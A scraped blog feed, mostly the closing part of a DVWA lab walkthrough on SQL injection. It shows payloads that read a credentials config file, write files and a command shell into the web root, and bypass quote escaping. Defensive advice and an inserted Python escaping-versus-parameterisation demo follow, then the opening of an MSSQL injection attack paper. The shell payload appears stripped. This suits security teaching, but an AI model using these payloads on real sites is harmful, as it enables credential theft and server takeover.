padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: x-small;"><span style="font-family: Consolas, serif;">This should show us the .htaccess file. We could, of course, read any file that the SQL server has read rights to. You could check for .htpasswd, or some other file that contains sensitive information. PHP files that access a SQL database will often have the database password (likely in plain text) listed in the file. SQL injection will allow us to view the .php file without the PHP first being interpreted by the server.</span></span></li>
</ul></li>
</ul><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span> <span style="color: red;"><span style="font-family: Consolas, serif;">‘ UNION ALL SELECT load_file(‘C:\\xampp\\htdocs\\dvwa\\config\\config.inc.php’), ’1</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This works without error, but there is nothing printed to the screen. If you view the page source however, you should find something interesting.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Writing arbitrary files"></a><span style="font-family: Consolas, serif;"><strong>Writing arbitrary files:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><strong>'</strong></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>'UNION SELECT 'test', '123' INTO OUTFILE 'testing1.txt</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><strong>'"</strong></span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The command will likely return a few warnings – look closely, as these could contain file paths that hint at the location of the web root on the server. If all goes well, you should see a file named testing1.txt in the SQL data path (if you are using XAMPP on Windows, it should be something like C:\xampp\mysql\data\dvwa\testing1.txt). Let’s try to write a file accessible to the web.</span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>'UNION SELECT 'test', '123' INTO OUTFILE 'c:\\xampp\\htdocs\\testing2.txt</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>'</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Now, point your web browser to “http://[web root]/testing2.txt”. What do you see? It’s our OUTFILE! This means that an attacker has the ability to change existing web pages via SQL injection, and to add their own pages to the site. It may also mean that remote code execution is possible…</li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Remote Code execution"></a><span style="font-family: Consolas, serif;"><strong>Remote Code execution:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>' UNION SELECT '', '' INTO OUTFILE 'C:\\xampp\\htdocs\\dvwa\\shell.php';#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Now point your browser to </span><span style="color: red;"><span style="font-family: Consolas, serif;">http://[web root]/dvwa/shell.php?cmd=dir</span></span><span style="font-family: Consolas, serif;">. Game over! We have just run a command on the remote server. From here we could download and run files (backdoor, keylogger, etc…), change system settings, add system users, etc…</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Note that if you try to change the directory, the change will not persist the next time you run a command: each command runs in a new process. To find out what directory you are in, use the remote shell to execute the command 'echo %25CD%25'.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Getting around escaped characters:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: x-small;"><span style="font-family: Consolas, serif;">So far we have been using DVWA on the low security setting. Click on the “DVWA Security” tab on the left side of the DVWA webpage. Change the setting to medium and click Submit. Go back to “SQL Injection” and try an injection phrase that checks for the handling of quotes.</span></span></li>
</ul><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span> <span style="color: red;"><span style="font-family: Consolas, serif;">O'Malley'</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: red;">\'Malley</span>' at line 1</li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Note that there is now a \ in front of our single quote. In SQL, a \ causes the character after it to be taken literally. Instead of the single quote being interpreted as closing the string opened by “</span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">user_id='</span></span><span style="font-family: Consolas, serif;">”, it is interpreted as text.</span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span> <span style="color: red;"><span style="font-family: Consolas, serif;">1 OR 1=1</span></span><span style="color: #0099ff;"><span style="font-family: Consolas, serif;">'</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">"</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">As we can see, if we avoid certain characters, we can still trick the server into running our injection phrase. Play around with the previously mentioned injection phrases – but first remove any quotes. Many of the above injection phrases will still work without quotes.</span></li>
</ul></li>
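The quote-free bypass just shown, and the whitelist and escaping advice in the next section, as an added example that is not part of the walkthrough: an in-memory SQLite stand-in for DVWA's users table (constructed rows), a quote-only escaping helper standing in for mysql_real_escape_string(), and three ways of building the same lookup. The function names and the assumption that the "medium" value lands in an unquoted numeric context are mine.

```python
"""Why escaping quotes alone does not stop SQL injection, and what a whitelist
plus a bound parameter changes. SQLite stands in for MySQL; its quote escaping
doubles the quote where MySQL backslashes it, but the point is the same."""
import re
import sqlite3

# Constructed rows standing in for DVWA's users table (not DVWA's real data).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Pablo", "Picasso"),
]

QUERY_PREFIX = "SELECT first_name, last_name FROM users WHERE user_id = "


def make_db():
    """Fresh in-memory database shaped like DVWA's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
        "first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def escape_quotes(value):
    """Quote escaping only, standing in for mysql_real_escape_string().
    It touches nothing but quotes: spaces, '=' and OR pass straight through."""
    return value.replace("'", "''")


def low_lookup(user_input, conn=None):
    """DVWA 'low' style: raw input pasted inside a quoted literal."""
    if conn is None:
        conn = make_db()
    sql = QUERY_PREFIX + "'" + user_input + "'"
    return conn.execute(sql).fetchall()


def escaped_quoted_lookup(user_input, conn=None):
    """Escaped input inside a quoted literal: the quote-based tricks stop working."""
    if conn is None:
        conn = make_db()
    sql = QUERY_PREFIX + "'" + escape_quotes(user_input) + "'"
    return conn.execute(sql).fetchall()


def escaped_numeric_lookup(user_input, conn=None):
    """Escaped input in an unquoted numeric context: no quote is needed, so the
    escaping changes nothing and '1 OR 1=1' still matches every row."""
    if conn is None:
        conn = make_db()
    sql = QUERY_PREFIX + escape_quotes(user_input)
    return conn.execute(sql).fetchall()


def is_valid_user_id(value):
    """Whitelist: a user_id is a short run of decimal digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def safe_lookup(user_input, conn=None):
    """Whitelist the input, bind it as a parameter, and return at most one row."""
    if not is_valid_user_id(user_input):
        raise ValueError("user_id must be a short decimal number")
    if conn is None:
        conn = make_db()
    row = conn.execute(QUERY_PREFIX + "?", (int(user_input),)).fetchone()
    return [row] if row is not None else []


if __name__ == "__main__":
    for label, fn, payload in [
        ("low, quoted", low_lookup, "1' OR '1'='1"),
        ("escaped, quoted", escaped_quoted_lookup, "1' OR '1'='1"),
        ("escaped, numeric", escaped_numeric_lookup, "1 OR 1=1"),
    ]:
        print(f"{label:18s} {payload!r:18s} -> {len(fn(payload))} row(s)")
    print("safe, bound        '2' ->", safe_lookup("2"))
```

The length limit and the single-row fetch in safe_lookup are the "limit input by length" and "return only one result" points of the next section; the regex is the whitelist.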
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Protect Yourself from SQL Injection:</strong></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Hopefully this walkthrough has shown how important it is to protect your site against SQL injection. NEVER take user input and place it directly into a SQL query. Always sanitize user input. Watch for characters like ', ", _, %, <em>\x00</em>, <em>\n</em>, <em>\r</em>, <em>\</em> and <em>\x1a</em>. If possible, create a whitelist of acceptable characters, and don’t make it contain any more than you need. Limit user input by length (and make sure the user can’t send more data than expected by modifying the form’s HTML). If only one result is expected, return only one result. If you are using PHP and MySQL, it is often best to assign the input to a variable and then pass it through stripslashes() and then the mysql_real_escape_string() function. Once this is done, SQL injection will be much more difficult – for a query like the one we were working with, it should become impossible. Avoid displaying server errors when possible. Always make sure to use a least-privileged database account. Test, test, test. There are many automated SQL injection tools; I recommend using them to test your code. Having a professional code audit is never a bad idea either.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: medium;"><strong>Sources</strong></span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">To give credit where it is due – the following sites were referenced while creating this walkthrough. I would highly recommend checking them out:</span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><a href="http://www.apachefriends.org/en/xampp.html" style="color: #a2a2a2; text-decoration: underline;">http://www.apachefriends.org/en/xampp.html</a> – The XAMPP site</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><a href="http://sourceforge.net/projects/dvwa/" style="color: #a2a2a2; text-decoration: underline;">http://sourceforge.net/projects/dvwa/</a> – Download location for DVWA</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><a href="http://www.youtube.com/watch?v=GzIj07jt8rM" style="color: #a2a2a2; text-decoration: underline;">http://www.youtube.com/watch?v=GzIj07jt8rM</a> – The official DVWA install video, showing how to install DVWA with XAMPP.</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://en.wikipedia.org/wiki/SQL_Injection" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://en.wikipedia.org/wiki/SQL_Injection</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://unixwiz.net/techtips/sql-injection.html" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://unixwiz.net/techtips/sql-injection.html</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://sqlzoo.net/hack/24table.htm" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://sqlzoo.net/hack/24table.htm</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.greensql.net/publications/backdoor-webserver-using-mysql-sql-injection" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://www.greensql.net/publications/backdoor-webserver-using-mysql-sql-injection</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://w3schools.com/sql/default.asp" style="color: #a2a2a2; text-decoration: underline;"><span style="font-family: Consolas, serif;">http://w3schools.com/sql/default.asp</span></a></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://msdn.microsoft.com/en-us/library/ff648339.aspx" style="color: #a2a2a2; text-decoration: underline;">http://msdn.microsoft.com/en-us/library/ff648339.aspx</a></li>
</ul><div><span class="Apple-style-span" style="color: white; font-family: Arial; font-size: small;"><span class="Apple-style-span" style="font-size: 13px; line-height: 18px;">Reference:</span></span></div><div><span class="Apple-style-span" style="color: white; font-family: Arial; font-size: small;"><span class="Apple-style-span" style="font-size: 13px; line-height: 18px;"><a href="http://www.hackyeah.com/2010/05/hack-yeah-sql-injection-walkthrough-dvwa/">http://www.hackyeah.com/2010/05/hack-yeah-sql-injection-walkthrough-dvwa/</a></span></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-5651809157153565152010-07-05T00:18:00.000-07:002010-07-05T00:18:50.521-07:00Dating is rough at the transport layer<div class="separator" style="clear: both; text-align: center;"><a href="http://blog.ksplice.com/wp-content/uploads/2010/04/ksplice-synack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://blog.ksplice.com/wp-content/uploads/2010/04/ksplice-synack.png" width="203" /></a></div><br />
<a href="http://blog.ksplice.com/2010/04/dating-is-rough-at-the-transport-layer/#comments" target='_blank'>http://blog.ksplice.com/2010/04/dating-is-rough-at-the-transport-layer/#comments</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-1018225470130531272010-06-02T06:52:00.001-07:002010-06-02T06:52:36.457-07:00Full MSSQL Injection PWNage<span class="Apple-style-span" style="font-size: 16px;"></span><br />
<pre>|=--------------------------------------------------------------------=|
|=----------------=[ Full MSSQL Injection PWNage ]=-----------------=|
|=-----------------------=[ 28 January 2009 ]=------------------------=|
|=---------------------=[ By CWH Underground ]=---------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Full MSSQL Injection PWNage
Author : ZeQ3uL && JabAv0C
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-01-28
##########
Contents
##########
[0x00] - Introduction
[0x01] - Know the Basic of SQL injection
[0x01a] - Introduction to SQL Injection Attack
[0x01b] - How to Test sites that are Vulnerable in SQL Injection
[0x01c] - Bypass Authentication with SQL Injection
[0x01d] - Audit Log Evasion
[0x01e] - (Perl Script) SQL-Google searching vulnerable sites
[0x02] - MSSQL Normal SQL Injection Attack
[0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
[0x02b] - ODBC Error Message Attack with "CONVERT"
[0x02c] - MSSQL Injection with UNION Attack
[0x02d] - MSSQL Injection in Web Services (SOAP Injection)
[0x03] - MSSQL Blind SQL Injection Attack
[0x03a] - How to Test sites that are Vulnerable in Blind SQL Injection
[0x03b] - Determine data through Blind SQL Injection
[0x03c] - Exploit Query for get Table name
[0x03d] - Exploit Query for get Column name
[0x04] - More Dangerous SQL Injection Attack
[0x04a] - Dangerous from Extended Stored Procedures
[0x04b] - Advanced SQL Injection Techniques
[0x04c] - Mass MSSQL Injection Worms
[0x05] - MSSQL Injection Cheat Sheet
[0x06] - SQL Injection Countermeasures
[0x07] - References
[0x08] - Greetz To
#######################
[0x00] - Introduction
#######################
Welcome reader, this paper is a short attempt at documenting a practical technique
we have been working on. It walks through the techniques an attacker uses to gain access
while exploiting a website via SQL injection, focusing on MSSQL only.
This paper is divided into 8 sections, but only sections 0x01 to 0x06
contain technical information.
Section 0x01 covers the basics of SQL injection vulnerabilities, which
are classified into two types, normal and blind. Section 0x02 details each way of
attacking through SQL injection. Section 0x03 explains how to enumerate data through
blind SQL injection. Section 0x04 shows more dangerous approaches that can follow from
SQL injection vulnerabilities. Section 0x05 collects MSSQL queries for several purposes.
Section 0x06 offers some tips for protecting a system from SQL injection attacks.
##########################################
[0x01] - Know the Basic of SQL injection
##########################################
SQL injection vulnerabilities occur when the database server can be made to execute arbitrary SQL
(Structured Query Language) commands. Typically executed through the web application front end (user interface,
form, etc.), the attack involves entering malformed or unexpected SQL statements which result in unauthorized
execution of SQL commands on the database server.
++++++++++++++++++++++++++++++++++++++++++++++++
[0x01a] - Introduction to SQL Injection Attack
